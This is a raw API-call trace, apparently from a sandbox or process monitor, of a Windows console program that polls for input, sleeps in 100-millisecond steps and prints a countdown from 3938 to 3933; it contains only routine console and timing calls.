[0146.899] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0146.899] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fee
[0146.899] Sleep (dwMilliseconds=0x64)
[0147.008] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0147.008] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fee
[0147.008] Sleep (dwMilliseconds=0x64)
[0147.117] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0147.117] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fee
[0147.117] Sleep (dwMilliseconds=0x64)
[0147.226] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0147.226] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fef
[0147.226] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083938") returned 8
[0147.226] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0147.227] __iob_func () returned 0x757a2900
[0147.227] _fileno (_File=0x757a2920) returned 1
[0147.227] _errno () returned 0x5507d8
[0147.227] _get_osfhandle (_FileHandle=1) returned 0x4c
[0147.227] _errno () returned 0x5507d8
[0147.227] GetFileType (hFile=0x4c) returned 0x2
[0147.227] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0147.227] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0147.227] lstrlenW (lpString="\x08\x08\x08\x083938") returned 8
[0147.227] GetConsoleOutputCP () returned 0x1b5
[0147.227] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083938", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0147.227] GetConsoleOutputCP () returned 0x1b5
[0147.227] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083938", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083938", lpUsedDefaultChar=0x0) returned 8
[0147.227] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0147.227] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0147.227] Sleep (dwMilliseconds=0x64)
[0147.351] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0147.351] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fef
[0147.351] Sleep (dwMilliseconds=0x64)
[0147.460] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0147.461] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fef
[0147.461] Sleep (dwMilliseconds=0x64)
[0147.569] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0147.570] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fef
[0147.570] Sleep (dwMilliseconds=0x64)
[0147.679] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0147.679] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fef
[0147.679] Sleep (dwMilliseconds=0x64)
[0147.808] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0147.809] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fef
[0147.809] Sleep (dwMilliseconds=0x64)
[0147.928] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0147.928] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fef
[0147.928] Sleep (dwMilliseconds=0x64)
[0148.038] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0148.038] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fef
[0148.038] Sleep (dwMilliseconds=0x64)
[0148.178] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0148.178] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fef
[0148.178] Sleep (dwMilliseconds=0x64)
[0148.318] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0148.318] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff0
[0148.318] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083937") returned 8
[0148.318] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0148.319] __iob_func () returned 0x757a2900
[0148.319] _fileno (_File=0x757a2920) returned 1
[0148.319] _errno () returned 0x5507d8
[0148.319] _get_osfhandle (_FileHandle=1) returned 0x4c
[0148.319] _errno () returned 0x5507d8
[0148.319] GetFileType (hFile=0x4c) returned 0x2
[0148.319] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0148.319] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0148.319] lstrlenW (lpString="\x08\x08\x08\x083937") returned 8
[0148.319] GetConsoleOutputCP () returned 0x1b5
[0148.319] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083937", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0148.319] GetConsoleOutputCP () returned 0x1b5
[0148.320] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083937", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083937", lpUsedDefaultChar=0x0) returned 8
[0148.320] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0148.320] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0148.320] Sleep (dwMilliseconds=0x64)
[0148.443] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0148.444] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff0
[0148.444] Sleep (dwMilliseconds=0x64)
[0148.584] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0148.584] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff0
[0148.584] Sleep (dwMilliseconds=0x64)
[0148.724] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0148.724] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff0
[0148.724] Sleep (dwMilliseconds=0x64)
[0148.864] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0148.864] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff0
[0148.864] Sleep (dwMilliseconds=0x64)
[0149.020] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0149.020] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff0
[0149.020] Sleep (dwMilliseconds=0x64)
[0149.161] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0149.161] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff0
[0149.161] Sleep (dwMilliseconds=0x64)
[0149.301] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0149.301] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff1
[0149.301] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083936") returned 8
[0149.301] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0149.302] __iob_func () returned 0x757a2900
[0149.302] _fileno (_File=0x757a2920) returned 1
[0149.302] _errno () returned 0x5507d8
[0149.302] _get_osfhandle (_FileHandle=1) returned 0x4c
[0149.302] _errno () returned 0x5507d8
[0149.302] GetFileType (hFile=0x4c) returned 0x2
[0149.302] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0149.302] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0149.302] lstrlenW (lpString="\x08\x08\x08\x083936") returned 8
[0149.302] GetConsoleOutputCP () returned 0x1b5
[0149.302] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083936", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0149.302] GetConsoleOutputCP () returned 0x1b5
[0149.302] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083936", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083936", lpUsedDefaultChar=0x0) returned 8
[0149.302] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0149.303] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0149.303] Sleep (dwMilliseconds=0x64)
[0149.441] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0149.442] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff1
[0149.442] Sleep (dwMilliseconds=0x64)
[0149.583] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0149.583] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff1
[0149.583] Sleep (dwMilliseconds=0x64)
[0149.706] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0149.707] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff1
[0149.707] Sleep (dwMilliseconds=0x64)
[0149.839] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0149.840] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff1
[0149.840] Sleep (dwMilliseconds=0x64)
[0149.946] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0149.946] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff1
[0149.946] Sleep (dwMilliseconds=0x64)
[0150.051] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0150.052] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff1
[0150.052] Sleep (dwMilliseconds=0x64)
[0150.161] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0150.161] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff1
[0150.161] Sleep (dwMilliseconds=0x64)
[0150.268] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0150.268] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff2
[0150.269] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083935") returned 8
[0150.269] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0150.269] __iob_func () returned 0x757a2900
[0150.269] _fileno (_File=0x757a2920) returned 1
[0150.269] _errno () returned 0x5507d8
[0150.269] _get_osfhandle (_FileHandle=1) returned 0x4c
[0150.269] _errno () returned 0x5507d8
[0150.269] GetFileType (hFile=0x4c) returned 0x2
[0150.269] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0150.269] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0150.269] lstrlenW (lpString="\x08\x08\x08\x083935") returned 8
[0150.269] GetConsoleOutputCP () returned 0x1b5
[0150.269] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083935", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0150.269] GetConsoleOutputCP () returned 0x1b5
[0150.269] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083935", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083935", lpUsedDefaultChar=0x0) returned 8
[0150.269] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0150.270] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0150.270] Sleep (dwMilliseconds=0x64)
[0150.378] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0150.378] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff2
[0150.378] Sleep (dwMilliseconds=0x64)
[0150.487] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0150.487] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff2
[0150.487] Sleep (dwMilliseconds=0x64)
[0150.596] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0150.596] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff2
[0150.596] Sleep (dwMilliseconds=0x64)
[0150.705] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0150.705] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff2
[0150.705] Sleep (dwMilliseconds=0x64)
[0150.814] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0150.814] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff2
[0150.814] Sleep (dwMilliseconds=0x64)
[0150.923] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0150.924] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff2
[0150.924] Sleep (dwMilliseconds=0x64)
[0151.033] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0151.033] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff2
[0151.033] Sleep (dwMilliseconds=0x64)
[0151.142] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0151.142] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff2
[0151.142] Sleep (dwMilliseconds=0x64)
[0151.252] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0151.252] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff3
[0151.253] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083934") returned 8
[0151.253] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0151.253] __iob_func () returned 0x757a2900
[0151.253] _fileno (_File=0x757a2920) returned 1
[0151.253] _errno () returned 0x5507d8
[0151.253] _get_osfhandle (_FileHandle=1) returned 0x4c
[0151.253] _errno () returned 0x5507d8
[0151.253] GetFileType (hFile=0x4c) returned 0x2
[0151.253] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0151.253] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0151.253] lstrlenW (lpString="\x08\x08\x08\x083934") returned 8
[0151.253] GetConsoleOutputCP () returned 0x1b5
[0151.253] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083934", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0151.253] GetConsoleOutputCP () returned 0x1b5
[0151.254] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083934", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083934", lpUsedDefaultChar=0x0) returned 8
[0151.254] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0151.254] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0151.254] Sleep (dwMilliseconds=0x64)
[0151.360] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0151.361] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff3
[0151.361] Sleep (dwMilliseconds=0x64)
[0151.469] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0151.470] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff3
[0151.470] Sleep (dwMilliseconds=0x64)
[0151.579] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0151.579] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff3
[0151.579] Sleep (dwMilliseconds=0x64)
[0151.688] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0151.688] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff3
[0151.688] Sleep (dwMilliseconds=0x64)
[0151.797] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0151.797] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff3
[0151.797] Sleep (dwMilliseconds=0x64)
[0151.906] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0151.906] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff3
[0151.906] Sleep (dwMilliseconds=0x64)
[0152.015] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0152.016] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff3
[0152.016] Sleep (dwMilliseconds=0x64)
[0152.125] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0152.125] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff3
[0152.125] Sleep (dwMilliseconds=0x64)
[0152.234] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0152.235] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff4
[0152.235] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083933") returned 8
[0152.235] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0152.235] __iob_func () returned 0x757a2900
[0152.235] _fileno (_File=0x757a2920) returned 1
[0152.235] _errno () returned 0x5507d8
[0152.235] _get_osfhandle (_FileHandle=1) returned 0x4c
[0152.235] _errno () returned 0x5507d8
[0152.235] GetFileType (hFile=0x4c) returned 0x2
[0152.235] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0152.235] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0152.235] lstrlenW (lpString="\x08\x08\x08\x083933") returned 8
[0152.235] GetConsoleOutputCP () returned 0x1b5
[0152.235] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083933", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0152.235] GetConsoleOutputCP () returned 0x1b5
[0152.236] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083933", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083933", lpUsedDefaultChar=0x0) returned 8
[0152.236] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0152.236] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0152.236] Sleep (dwMilliseconds=0x64)
[0152.343] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0152.343] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff4
[0152.343] Sleep (dwMilliseconds=0x64)
[0152.452] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0152.452] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff4
[0152.453] Sleep (dwMilliseconds=0x64)
[0152.561] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0152.562] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff4
[0152.562] Sleep (dwMilliseconds=0x64)
[0152.671] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0152.671] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff4
[0152.671] Sleep (dwMilliseconds=0x64)
